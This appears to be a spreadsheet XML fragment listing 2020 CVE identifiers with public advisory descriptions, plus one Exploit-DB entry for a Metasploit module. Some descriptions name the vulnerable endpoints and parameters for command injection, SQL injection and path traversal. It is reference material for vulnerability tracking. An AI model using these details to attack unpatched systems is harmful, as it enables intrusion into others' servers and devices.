  </si>
  <si>
    <t>Barco TransForm NDN-210 Lite, NDN-210 Pro, NDN-211 Lite, and NDN-211 Pro before 3.8 allows Command Injection (issue 1 of 4). The NDN-210 has a web administration panel which is made available over https. The logon method is basic authentication. There is a command injection issue that will result in unauthenticated remote code execution in the username and password fields of the logon prompt. The NDN-210 is part of Barco TransForm N solution and includes the patch from TransForm N version 3.8 onwards.</t>
  </si>
  <si>
    <t>CVE-2020-17502</t>
  </si>
  <si>
    <t>Barco TransForm N before 3.8 allows Command Injection (issue 2 of 4). The NDN-210 has a web administration panel which is made available over https. There is a command injection issue that will allow authenticated users of the administration panel to perform authenticated remote code execution. An issue exists in split_card_cmd.php in which the http parameters xmodules, ymodules and savelocking are not properly handled. The NDN-210 is part of Barco TransForm N solution and includes the patch from TransForm N version 3.8 onwards.</t>
  </si>
  <si>
    <t>CVE-2020-17503</t>
  </si>
  <si>
    <t>The NDN-210 has a web administration panel which is made available over https. There is a command injection issue that will allow authenticated users to the administration panel to perform authenticated remote code execution. An issue exists in split_card_cmd.php in which the http parameter "locking" is not properly handled. The NDN-210 is part of Barco TransForm N solution and this vulnerability is patched from TransForm N version 3.8 onwards.</t>
  </si>
  <si>
    <t>CVE-2020-17504</t>
  </si>
  <si>
    <t>The NDN-210 has a web administration panel which is made available over https. There is a command injection issue that will allow authenticated users to the administration panel to perform authenticated remote code execution. An issue exists in ngpsystemcmd.php in which the http parameters "x_modules" and "y_modules" are not properly handled. The NDN-210 is part of Barco TransForm N solution and this vulnerability is patched from TransForm N version 3.8 onwards.</t>
  </si>
  <si>
    <t>CVE-2020-17505</t>
  </si>
  <si>
    <t>Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.</t>
  </si>
  <si>
    <t>CVE-2020-17506</t>
  </si>
  <si>
    <t>Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.</t>
  </si>
  <si>
    <t>CVE-2020-17507</t>
  </si>
  <si>
    <t>An issue was discovered in Qt through 5.12.9, and 5.13.x through 5.15.x before 5.15.1. read_xbm_body in gui/image/qxbmhandler.cpp has a buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-17508</t>
  </si>
  <si>
    <t>The ATS ESI plugin has a memory disclosure vulnerability. If you are running the plugin please upgrade. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-17509</t>
  </si>
  <si>
    <t>ATS negative cache option is vulnerable to a cache poisoning attack. If you have this option enabled, please upgrade or disable this feature. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-1751</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>exploits/java/webapps/49398.rb</t>
  </si>
  <si>
    <t>Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)</t>
  </si>
  <si>
    <t>2021-01-08</t>
  </si>
  <si>
    <t>CVE-2020-17510</t>
  </si>
  <si>
    <t>Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2020-17511</t>
  </si>
  <si>
    <t>In Airflow versions prior to 1.10.13, when creating a user using airflow CLI, the password gets logged in plain text in the Log table in Airflow Metadatase. Same happened when creating a Connection with a password field.</t>
  </si>
  <si>
    <t>CVE-2020-17513</t>
  </si>
  <si>
    <t>In Apache Airflow versions prior to 1.10.13, the Charts and Query View of the old (Flask-admin based) UI were vulnerable for SSRF attack.</t>
  </si>
  <si>
    <t>CVE-2020-17514</t>
  </si>
  <si>
    <t>Apache Fineract prior to 1.5.0 disables HTTPS hostname verification in ProcessorHelper in the configureClient method. Under typical deployments, a man in the middle attack could be successful.</t>
  </si>
  <si>
    <t>CVE-2020-17515</t>
  </si>
  <si>
    <t>The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions prior to 1.10.13. This is same as CVE-2020-13944 but the implemented fix in Airflow 1.10.13 did not fix the issue completely.</t>
  </si>
  <si>
    <t>CVE-2020-17516</t>
  </si>
  <si>
    <t>Apache Cassandra versions 2.1.0 to 2.1.22, 2.2.0 to 2.2.19, 3.0.0 to 3.0.23, and 3.11.0 to 3.11.9, when using 'dc' or 'rack' internode_encryption setting, allows both encrypted and unencrypted internode connections. A misconfigured node or a malicious user can use the unencrypted connection despite not being in the same rack or dc, and bypass mutual TLS requirement.</t>
  </si>
  <si>
    <t>CVE-2020-17517</t>
  </si>
  <si>
    <t>The S3 buckets and keys in a secure Apache Ozone Cluster must be inaccessible to anonymous access by default. The current security vulnerability allows access to keys and buckets through a curl command or an unauthenticated HTTP request. This enables unauthorized access to buckets and keys thereby exposing data to anonymous clients or users. This affected Apache Ozone prior to the 1.1.0 release.</t>
  </si>
  <si>
    <t>CVE-2020-17518</t>
  </si>
  <si>
    <t>Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master.</t>
  </si>
  <si>
    <t>CVE-2020-17519</t>
  </si>
  <si>
    <t>A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.</t>
  </si>
  <si>
    <t>CVE-2020-1752</t>
  </si>
  <si>
    <t>A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.</t>
  </si>
  <si>
    <t>CVE-2020-17520</t>
  </si>
  <si>
    <t>In the Pulsar manager 0.1.0 version, malicious users will be able to bypass pulsar-manager's admin, permission verification mechanism by constructing special URLs, thereby accessing any HTTP API.</t>
  </si>
  <si>
    <t>CVE-2020-17521</t>
  </si>
  <si>
    <t>Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2.</t>
  </si>
  <si>
    <t>CVE-2020-17522</t>
  </si>
  <si>
    <t>When ORT (now via atstccfg) generates ip_allow.config files in Apache Traffic Control 3.0.0 to 3.1.0 and 4.0.0 to 4.1.0, those files include permissions that allow bad actors to push arbitrary content into and remove arbitrary content from CDN cache servers. Additionally, these permissions are potentially extended to IP addresses outside the desired range, resulting in them being granted to clients possibly outside the CDN arcitechture.</t>
  </si>
  <si>
    <t>CVE-2020-17523</t>
  </si>
  <si>
    <t>Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2020-17525</t>
  </si>
  <si>
    <t>Subversion's mod_authz_svn module will crash if the server is using in-repository authz rules with the AuthzSVNReposRelativeAccessFile option and a client sends a request for a non-existing repository URL. This can lead to disruption for users of the service. This issue was fixed in mod_dav_svn+mod_authz_svn servers 1.14.1 and mod_dav_svn+mod_authz_svn servers 1.10.7</t>
  </si>
  <si>
    <t>CVE-2020-17526</t>
  </si>
  <si>
    <t>Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.</t>
  </si>
  <si>
    <t>CVE-2020-17527</t>
  </si>
  <si>
    <t>While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.</t>
  </si>
  <si>
    <t>CVE-2020-17528</t>
  </si>
  <si>
    <t>Out-of-bounds Write vulnerability in TCP stack of Apache NuttX (incubating) versions up to and including 9.1.0 and 10.0.0 allows attacker to corrupt memory by supplying arbitrary urgent data pointer offsets within TCP packets including beyond the length of the packet.</t>
  </si>
  <si>
    <t>CVE-2020-17529</t>
  </si>
  <si>
    <t>Out-of-bounds Write vulnerability in TCP Stack of Apache NuttX (incubating) versions up to and including 9.1.0 and 10.0.0 allows attacker to corrupt memory by supplying and invalid fragmentation offset value specified in the IP header. This is only impacts builds with both CONFIG_EXPERIMENTAL and CONFIG_NET_TCP_REASSEMBLY build flags enabled.</t>
  </si>
  <si>
    <t>CVE-2020-1753</t>
  </si>
  <si>
    <t>A security flaw was found in Ansible Engine, all Ansible 2.7.x versions prior to 2.7.17, all Ansible 2.8.x versions prior to 2.8.11 and all Ansible 2.9.x versions prior to 2.9.7, when managing kubernetes using the k8s module. Sensitive parameters such as passwords and tokens are passed to kubectl from the command line, not using an environment variable or an input configuration file. This will disclose passwords and tokens from process list and no_log directive from debug module would not have any effect making these secrets being disclosed on stdout and log files.</t>
  </si>
  <si>
    <t>CVE-2020-17530</t>
  </si>
  <si>
    <t>Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.</t>
  </si>
  <si>
    <t>CVE-2020-17531</t>
  </si>
  <si>
    <t>A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will be released. Apache Tapestry 5 versions are not vulnerable to this issue. Users of Apache Tapestry 4 should upgrade to the latest Apache Tapestry 5 version.</t>
  </si>
  <si>
    <t>CVE-2020-17532</t>
  </si>
  <si>
    <t>When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution. The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5</t>
  </si>
  <si>
    <t>CVE-2020-17533</t>
  </si>
  <si>
    <t>Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties.</t>
  </si>
  <si>
    <t>CVE-2020-17534</t>
  </si>
  <si>
    <t>There exists a race condition between the deletion of the temporary file and the creation of the temporary directory in `webkit` subproject of HTML/Java API version 1.7. A similar vulnerability has recently been disclosed in other Java projects and the fix in HTML/Java API version 1.7.1 follows theirs: To avoid local privilege escalation version 1.7.1 creates the temporary directory atomically without dealing with the temporary file: https://github.com/apache/netbeans-html4j/commit/fa70e507e5555e1adb4f6518479fc408a7abd0e6</t>
  </si>
  <si>
    <t>CVE-2020-17538</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in GetNumSameData() in contrib/lips4/gdevlips.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-1754</t>
  </si>
  <si>
    <t>In Moodle before 3.8.2, 3.7.5, 3.6.9 and 3.5.11, users viewing the grade history report without the 'access all groups' capability were not restricted to viewing grades of users within their own groups.</t>
  </si>
  <si>
    <t>CVE-2020-17541</t>
  </si>
  <si>
    <t>Libjpeg-turbo all version have a stack-based buffer overflow in the "transform" component. A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service.</t>
  </si>
  <si>
    <t>CVE-2020-17542</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in dotCMS v5.1.5 allows remote attackers to execute arbitrary code by injecting a malicious payload into the "Task Detail" comment window of the "/dotAdmin/#/c/workflow" component.</t>
  </si>
  <si>
    <t>CVE-2020-1755</t>
  </si>
  <si>
    <t>In Moodle before 3.8.2, 3.7.5, 3.6.9 and 3.5.11, X-Forwarded-For headers could be used to spoof a user's IP, in order to bypass remote address checks.</t>
  </si>
  <si>
    <t>CVE-2020-17551</t>
  </si>
  <si>
    <t>ImpressCMS 1.4.0 is affected by XSS in modules/system/admin.php which may result in arbitrary remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-1756</t>
  </si>
  <si>
    <t>In Moodle before 3.8.2, 3.7.5, 3.6.9 and 3.5.11, insufficient input escaping was applied to the PHP unit webrunner admin tool.</t>
  </si>
  <si>
    <t>CVE-2020-17563</t>
  </si>
  <si>
    <t>Path Traversal in FeiFeiCMS v4.0 allows remote attackers to delete arbitrary files by sending a crafted HTTP request to " /index.php?s=/admin-tpl-del&amp;id=".</t>
  </si>
  <si>
    <t>CVE-2020-17564</t>
  </si>
  <si>
    <t>Path Traversal in FeiFeiCMS v4.0 allows remote attackers to delete arbitrary files by sending a crafted HTTP request to the " Admin/DataAction.class.php" component.</t>
  </si>
  <si>
    <t>CVE-2020-1757</t>
  </si>
  <si>
    <t>A flaw was found in all undertow-2.x.x SP1 versions prior to undertow-2.0.30.SP1, all undertow-1.x.x and undertow-2.x.x versions prior to undertow-2.1.0.Final, where the Servlet container causes servletPath to normalize incorrectly by truncating the path after semicolon which may lead to an application mapping resulting in the security bypass.</t>
  </si>
  <si>
    <t>CVE-2020-1758</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack.</t>
  </si>
  <si>
    <t>CVE-2020-1759</t>
  </si>
  <si>
    <t>A vulnerability was found in Red Hat Ceph Storage 4 and Red Hat Openshift Container Storage 4.2 where, A nonce reuse vulnerability was discovered in the secure mode of the messenger v2 protocol, which can allow an attacker to forge auth tags and potentially manipulate the data by leveraging the reuse of a nonce in a session. Messages encrypted using a reused nonce value are susceptible to serious confidentiality and integrity attacks.</t>
  </si>
  <si>
    <t>323</t>
  </si>
  <si>
    <t>CVE-2020-1760</t>
  </si>
  <si>
    <t>A flaw was found in the Ceph Object Gateway, where it supports request sent by an anonymous user in Amazon S3. This flaw could lead to potential XSS attacks due to the lack of proper neutralization of untrusted input.</t>
  </si>
  <si>
    <t>CVE-2020-1761</t>
  </si>
  <si>
    <t>A flaw was found in the OpenShift web console, where the access token is stored in the browser's local storage. An attacker can use this flaw to get the access token via physical access, or an XSS attack on the victim's browser. This flaw affects openshift/console versions before openshift/console-4.</t>
  </si>
  <si>
    <t>CVE-2020-1762</t>
  </si>
  <si>
    <t>An insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.</t>
  </si>
  <si>
    <t>CVE-2020-1763</t>
  </si>
  <si>
    <t>An out-of-bounds buffer read flaw was found in the pluto daemon of libreswan from versions 3.27 till 3.31 where, an unauthenticated attacker could use this flaw to crash libreswan by sending specially-crafted IKEv1 Informational Exchange packets. The daemon respawns after the crash.</t>
  </si>
  <si>
    <t>CVE-2020-1764</t>
  </si>
  <si>
    <t>A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.</t>
  </si>
  <si>
    <t>CVE-2020-1765</t>
  </si>
  <si>
    <t>An improper control of parameters allows the spoofing of the from fields of the following screens: AgentTicketCompose, AgentTicketForward, AgentTicketBounce and AgentTicketEmailOutbound. This issue affects: ((OTRS)) Community Edition 5.0.x version 5.0.39 and prior versions; 6.0.x version 6.0.24 and prior versions. OTRS 7.0.x version 7.0.13 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1766</t>
  </si>
  <si>
    <t>Due to improper handling of uploaded images it is possible in very unlikely and rare conditions to force the agents browser to execute malicious javascript from a special crafted SVG file rendered as inline jpg file. This issue affects: ((OTRS)) Community Edition 5.0.x version 5.0.39 and prior versions; 6.0.x version 6.0.24 and prior versions. OTRS 7.0.x version 7.0.13 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1767</t>
  </si>
  <si>
    <t>Agent A is able to save a draft (i.e. for customer reply). Then Agent B can open the draft, change the text completely and send it in the name of Agent A. For the customer it will not be visible that the message was sent by another agent. This issue affects: ((OTRS)) Community Edition 6.0.x version 6.0.24 and prior versions. OTRS 7.0.x version 7.0.13 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1768</t>
  </si>
  <si>
    <t>The external frontend system uses numerous background calls to the backend. Each background request is treated as user activity so the SessionMaxIdleTime will not be reached. This issue affects: OTRS 7.0.x version 7.0.14 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1769</t>
  </si>
  <si>
    <t>In the login screens (in agent and customer interface), Username and Password fields use autocomplete, which might be considered as security issue. This issue affects: ((OTRS)) Community Edition: 5.0.41 and prior versions, 6.0.26 and prior versions. OTRS: 7.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1770</t>
  </si>
  <si>
    <t>Support bundle generated files could contain sensitive information that might be unwanted to be disclosed. This issue affects: ((OTRS)) Community Edition: 5.0.41 and prior versions, 6.0.26 and prior versions. OTRS: 7.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1771</t>
  </si>
  <si>
    <t>Attacker is able craft an article with a link to the customer address book with malicious content (JavaScript). When agent opens the link, JavaScript code is executed due to the missing parameter encoding. This issue affects: ((OTRS)) Community Edition: 6.0.26 and prior versions. OTRS: 7.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1772</t>
  </si>
  <si>
    <t>It's possible to craft Lost Password requests with wildcards in the Token value, which allows attacker to retrieve valid Token(s), generated by users which already requested new passwords. This issue affects: ((OTRS)) Community Edition 5.0.41 and prior versions, 6.0.26 and prior versions. OTRS: 7.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1773</t>
  </si>
  <si>
    <t>An attacker with the ability to generate session IDs or password reset tokens, either by being able to authenticate or by exploiting OSA-2020-09, may be able to predict other users session IDs, password reset tokens and automatically generated passwords. This issue affects ((OTRS)) Community Edition: 5.0.41 and prior versions, 6.0.26 and prior versions. OTRS; 7.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1774</t>
  </si>
  <si>
    <t>When user downloads PGP or S/MIME keys/certificates, exported file has same name for private and public keys. Therefore it's possible to mix them and to send private key to the third-party instead of public key. This issue affects ((OTRS)) Community Edition: 5.0.42 and prior versions, 6.0.27 and prior versions. OTRS: 7.0.16 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1775</t>
  </si>
  <si>
    <t>BCC recipients in mails sent from OTRS are visible in article detail on external interface. This issue affects OTRS: 8.0.3 and prior versions, 7.0.17 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-17752</t>
  </si>
  <si>
    <t>Integer overflow vulnerability in payable function of a smart contract implementation for an Ethereum token, as demonstrated by the smart contract implemented at address 0xB49E984A83d7A638E7F2889fc8328952BA951AbE, an implementation for MillionCoin (MON).</t>
  </si>
  <si>
    <t>CVE-2020-17753</t>
  </si>
  <si>
    <t>An issue was discovered in function addMeByRC in the smart contract implementation for RC, an Ethereum token, allows attackers to transfer an arbitrary amount of tokens to an arbitrary address.</t>
  </si>
  <si>
    <t>CVE-2020-17759</t>
  </si>
  <si>
    <t>An issue was found in the Evernote client for Windows 10, 7, and 2008 in the protocol handler. This enables attackers for arbitrary command execution if the user clicks on a specially crafted URL. AKA: WINNOTE-19941.</t>
  </si>
  <si>
    <t>CVE-2020-1776</t>
  </si>
  <si>
    <t>When an agent user is renamed or set to invalid the session belonging to the user is keept active. The session can not be used to access ticket data in the case the agent is invalid. This issue affects ((OTRS)) Community Edition: 6.0.28 and prior versions. OTRS: 7.0.18 and prior versions, 8.0.4. and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1777</t>
  </si>
  <si>
    <t>Agent names that participates in a chat conversation are revealed in certain parts of the external interface as well as in chat transcriptions inside the tickets, when system is configured to mask real agent names. This issue affects OTRS; 7.0.21 and prior versions, 8.0.6 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1778</t>
  </si>
  <si>
    <t>When OTRS uses multiple backends for user authentication (with LDAP), agents are able to login even if the account is set to invalid. This issue affects OTRS; 8.0.9 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1779</t>
  </si>
  <si>
    <t>When dynamic templates are used (OTRSTicketForms), admin can use OTRS tags which are not masked properly and can reveal sensitive information. This issue affects: OTRS AG OTRSTicketForms 6.0.x version 6.0.40 and prior versions; 7.0.x version 7.0.29 and prior versions; 8.0.x version 8.0.3 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1785</t>
  </si>
  <si>
    <t>Mate 10 Pro;Honor V10;Honor 10;Nova 4 smartphones have a denial of service vulnerability. The system does not properly check the status of certain module during certain operations, an attacker should trick the user into installing a malicious application, successful exploit could cause reboot of the smartphone.</t>
  </si>
  <si>
    <t>CVE-2020-1786</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 Pro smartphones versions earlier than 10.0.0.175(C00E69R3P8) have an improper authentication vulnerability. The software does not sufficiently validate the name of apk file in a special condition which could allow an attacker to forge a crafted application as a normal one. Successful exploit could allow the attacker to bypass digital balance function.</t>
  </si>
  <si>
    <t>CVE-2020-1787</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones versions earlier than 9.1.0.139(C00E133R3P1) have an improper authentication vulnerability. The system has a logic error under certain scenario, successful exploit could allow the attacker who gains the privilege of guest user to access to the host user's desktop in an instant, without unlocking the screen lock of the host user.</t>
  </si>
  <si>
    <t>CVE-2020-1788</t>
  </si>
  <si>
    <t>Honor V30 smartphones with versions earlier than 10.0.1.135(C00E130R4P1) have an improper authentication vulnerability. Certain applications do not properly validate the identity of another application who would call its interface. An attacker could trick the user into installing a malicious application. Successful exploit could allow unauthorized actions leading to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1789</t>
  </si>
  <si>
    <t>Huawei OSCA-550, OSCA-550A, OSCA-550AX, and OSCA-550X products with version 1.0.1.21(SP3) have an insufficient authentication vulnerability. The software does not require a strong credential when the user trying to do certain operations. Successful exploit could allow an attacker to pass the authentication and do certain operations by a weak credential.</t>
  </si>
  <si>
    <t>CVE-2020-17891</t>
  </si>
  <si>
    <t>TP-Link Archer C1200 firmware version 1.13 Build 2018/01/24 rel.52299 EU has a XSS vulnerability allowing a remote attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-1790</t>
  </si>
  <si>
    <t>GaussDB 200 with version of 6.5.1 have a command injection vulnerability. The software constructs part of a command using external input from users, but the software does not sufficiently validate the user input. Successful exploit could allow the attacker to inject certain commands.</t>
  </si>
  <si>
    <t>CVE-2020-17901</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) in PbootCMS 1.3.2 allows attackers to change the password of a user.</t>
  </si>
  <si>
    <t>CVE-2020-1791</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones with versions earlier than 10.0.0.185(C00E74R3P8) have an improper authorization vulnerability. The system has a logic judging error under certain scenario, successful exploit could allow the attacker to switch to third desktop after a series of operation in ADB mode.</t>
  </si>
  <si>
    <t>CVE-2020-1792</t>
  </si>
  <si>
    <t>Honor V10 smartphones with versions earlier than BKL-AL20 10.0.0.156(C00E156R2P4) and versions earlier than BKL-L09 10.0.0.146(C432E4R1P4) have an out of bounds write vulnerability. The software writes data past the end of the intended buffer because of insufficient validation of certain parameter when initializing certain driver program. An attacker could trick the user into installing a malicious application, successful exploit could cause the device to reboot.</t>
  </si>
  <si>
    <t>CVE-2020-1793</t>
  </si>
  <si>
    <t>There is an improper authentication vulnerability in several smartphones. The applock does not perform a sufficient authentication in certain scenarios, successful exploit could allow the attacker to gain certain data of the application which is locked. Affected product versions include:HUAWEI Mate 20 versions Versions earlier than 10.0.0.188(C00E74R3P8);HUAWEI Mate 30 Pro versions Versions earlier than 10.0.0.203(C00E202R7P2).</t>
  </si>
  <si>
    <t>CVE-2020-1794</t>
  </si>
  <si>
    <t>CVE-2020-1795</t>
  </si>
  <si>
    <t>There is a logic error vulnerability in several smartphones. The software does not properly restrict certain operation when the Digital Balance function is on. Successful exploit could allow the attacker to bypass the Digital Balance limit after a series of operations.Affected product versions include:HUAWEI Mate 20 versions Versions earlier than 10.0.0.188(C00E74R3P8);HUAWEI Mate 30 Pro versions Versions earlier than 10.0.0.203(C00E202R7P2).</t>
  </si>
  <si>
    <t>CVE-2020-17952</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in /library/think/App.php of Twothink v2.0 allows attackers to execute arbitrary PHP code.</t>
  </si>
  <si>
    <t>CVE-2020-1796</t>
  </si>
  <si>
    <t>There is an improper authorization vulnerability in several smartphones. The software incorrectly performs an authorization to certain user, successful exploit could allow a low privilege user to do certain operation which the user are supposed not to do.Affected product versions include:HUAWEI Mate 20 versions Versions earlier than 10.0.0.188(C00E74R3P8);HUAWEI Mate 30 Pro versions Versions earlier than 10.0.0.203(C00E202R7P2).</t>
  </si>
  <si>
    <t>CVE-2020-1797</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones with versions earlier than 10.0.0.185(C00E74R3P8) have an improper authorization vulnerability. The system does not properly restrict certain operation in ADB mode, successful exploit could allow certain user break the limit of digital balance function.</t>
  </si>
  <si>
    <t>CVE-2020-1798</t>
  </si>
  <si>
    <t>HUAWEI P30 smartphones with versions earlier than 10.1.0.135(C00E135R2P11) have an improper authentication vulnerability. A logic error occurs when handling NFC work, an attacker should establish a NFC connection to the target phone, and then do a series of operations on the target phone. Successful exploit could allow a guest user do certain operation which is beyond the guest user's privilege.</t>
  </si>
  <si>
    <t>CVE-2020-1799</t>
  </si>
  <si>
    <t>E6878-370 with versions of 10.0.3.1(H557SP27C233), 10.0.3.1(H563SP1C00), 10.0.3.1(H563SP1C233) has a use after free vulnerability. The software references memory after it has been freed in certain scenario, the attacker does a series of crafted operations through web portal, successful exploit could cause a use after free condition which may lead to malicious code execution.</t>
  </si>
  <si>
    <t>CVE-2020-17999</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in MiniCMS v1.10 allows remote attackers to execute arbitrary code by injecting commands via a crafted HTTP request to the component "/mc-admin/post-edit.php".</t>
  </si>
  <si>
    <t>CVE-2020-1800</t>
  </si>
  <si>
    <t>HUAWEI smartphones P30 with versions earlier than 10.0.0.185(C00E85R1P11) have an improper access control vulnerability. The software incorrectly restricts access to a function interface from an unauthorized actor, the attacker tricks the user into installing a crafted application, successful exploit could allow the attacker do certain unauthenticated operations.</t>
  </si>
  <si>
    <t>CVE-2020-1801</t>
  </si>
  <si>
    <t>There is an improper authentication vulnerability in several smartphones. Certain function interface in the system does not sufficiently validate the caller's identity in certain share scenario, successful exploit could cause information disclosure. Affected product versions include:Mate 30 Pro versions Versions earlier than 10.0.0.205(C00E202R7P2);Mate 30 versions Versions earlier than 10.0.0.205(C00E201R7P2).</t>
  </si>
  <si>
    <t>CVE-2020-18013</t>
  </si>
  <si>
    <t>SQL Injextion vulnerability exists in Whatsns 4.0 via the ip parameter in index.php?admin_banned/add.htm.</t>
  </si>
  <si>
    <t>CVE-2020-18019</t>
  </si>
  <si>
    <t>SQL Injection in Xinhu OA System v1.8.3 allows remote attackers to obtain sensitive information by injecting arbitrary commands into the "typeid" variable of the "createfolderAjax" function in the "mode_worcAction.php" component.</t>
  </si>
  <si>
    <t>CVE-2020-1802</t>
  </si>
  <si>
    <t>There is an insufficient integrity validation vulnerability in several products. The device does not sufficiently validate the integrity of certain file in certain loading processes, successful exploit could allow the attacker to load a crafted file to the device through USB.Affected product versions include:OSCA-550 versions 1.0.1.23(SP2);OSCA-550A versions 1.0.1.23(SP2);OSCA-550AX versions 1.0.1.23(SP2);OSCA-550X versions 1.0.1.23(SP2).</t>
  </si>
  <si>
    <t>CVE-2020-18020</t>
  </si>
  <si>
    <t>SQL Injection in PHPSHE Mall System v1.7 allows remote attackers to execute arbitrary code by injecting SQL commands into the "user_phone" parameter of a crafted HTTP request to the "admin.php" component.</t>
  </si>
  <si>
    <t>CVE-2020-18022</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Qibosoft QiboCMS v7 and earlier allows remote attackers to execute arbitrary code or obtain sensitive information by injecting arbitrary commands in a HTTP request to the "ewebeditor\3.1.1\kindeditor.js" component.</t>
  </si>
  <si>
    <t>CVE-2020-1803</t>
  </si>
  <si>
